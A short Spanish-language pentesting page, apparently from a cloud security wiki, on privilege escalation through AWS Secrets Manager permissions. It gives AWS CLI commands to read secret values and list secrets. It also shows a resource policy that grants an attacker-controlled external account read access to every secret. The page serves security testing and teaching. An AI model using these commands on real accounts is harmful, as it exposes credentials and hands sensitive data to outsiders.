AWS - Secrets Manager Privesc

Secrets Manager

Para obtener más información sobre Secrets Manager, consulta:

secretsmanager:GetSecretValue

Un atacante con este permiso puede obtener el valor guardado dentro de un secreto en AWS Secrets Manager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Impacto potencial: Acceder a datos altamente sensibles dentro del servicio AWS Secrets Manager.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Con los permisos anteriores es posible dar acceso a otros principios/cuentas (incluso externos) para acceder al secreto. Tenga en cuenta que para leer secretos encriptados con una clave KMS, el usuario también necesita tener acceso sobre la clave KMS (más información en la página de Enumeración de KMS).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}